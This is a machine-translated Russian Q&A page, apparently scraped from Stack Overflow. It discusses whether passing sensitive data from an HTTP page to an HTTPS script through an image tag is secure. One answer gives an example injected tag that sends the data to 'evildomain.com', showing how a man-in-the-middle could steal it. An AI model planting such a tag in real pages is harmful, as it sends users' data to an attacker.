1. дома
  2. Вопрос и ответ
  3. http, https & ajax bypass, может быть?

http, https & ajax bypass, может быть?

2009-10-09 1 views
0

У меня есть сценарий сервера, который мне нужно передать данные из браузера без перезагрузки страницы (aka ajax). Данные чувствительны, поэтому их следует отправлять через https. Однако страница находится на уровне http. Из-за того же ограничения домена/протокола браузер не разрешает это.http, https & ajax bypass, может быть?

Я имею в виду обмана системы немного, динамически создавая теги изображений и вызывать сценарий с помощью SRC тега, такие как:

<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />

Я хотел бы знать, если это действительно будет правильно зашифрован ,

источник

2009-10-09 mike_e

ответ

3

Проблема с этим заключается в том, что сама страница является только HTTP, тогда вы восприимчивы к человеку в средней атаке. Злоумышленник может просто изменить сценарий на странице посланного через HTTP, так что вместо этого он использует:

<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />

Пользователь будет ни одного-мудрее. Чтобы обойти это, вам действительно нужно также обслуживать страницу через HTTPS, что также решительно решает другую проблему.

(Это точно по той же причине, почему формы входа должны быть на HTTPS-страницах, а не только в виде формы HTTPS).

источник

2009-10-09 01:12:02 caf

+0

Если вам требуется шифрование SSL для входа в систему, весь ваш сайт должен находиться в https IMO. У вас есть объект уже, вы можете его использовать. –

+0

, если производительность/кэширование не является проблемой, что часто может быть. –

2

Да и нет.

Часть URL-адреса сервера, очевидно, не зашифрована, так как она используется для настройки соединения.

Все остальное шифруется при отправке через HTTPS-соединение. Но любой, кто просматривает источник, очевидно, сможет видеть опубликованные данные.

источник

2009-10-09 01:00:36 Zak

0

Следует также отметить, что некоторые браузеры не будут отображать (или будут предупреждать пользователя перед отображением) HTML-страницы смешанного режима (http против https). В некоторых случаях это может не сработать, потому что пользователь выбирает блокировку.

источник

2009-10-09 01:10:26

0

Возможная альтернатива технике изображения (недостатком которой, как уже упоминалось другими, является то, что содержимое смешанного режима не обрабатывается некоторыми браузерами) будет aSSL.

Любой способ приведет к шифрованию, и оба они по-прежнему уязвимы для людей в средних атаках.

источник

2009-10-09 01:19:21 ShZ

Смежные вопросы

 Смежные вопросы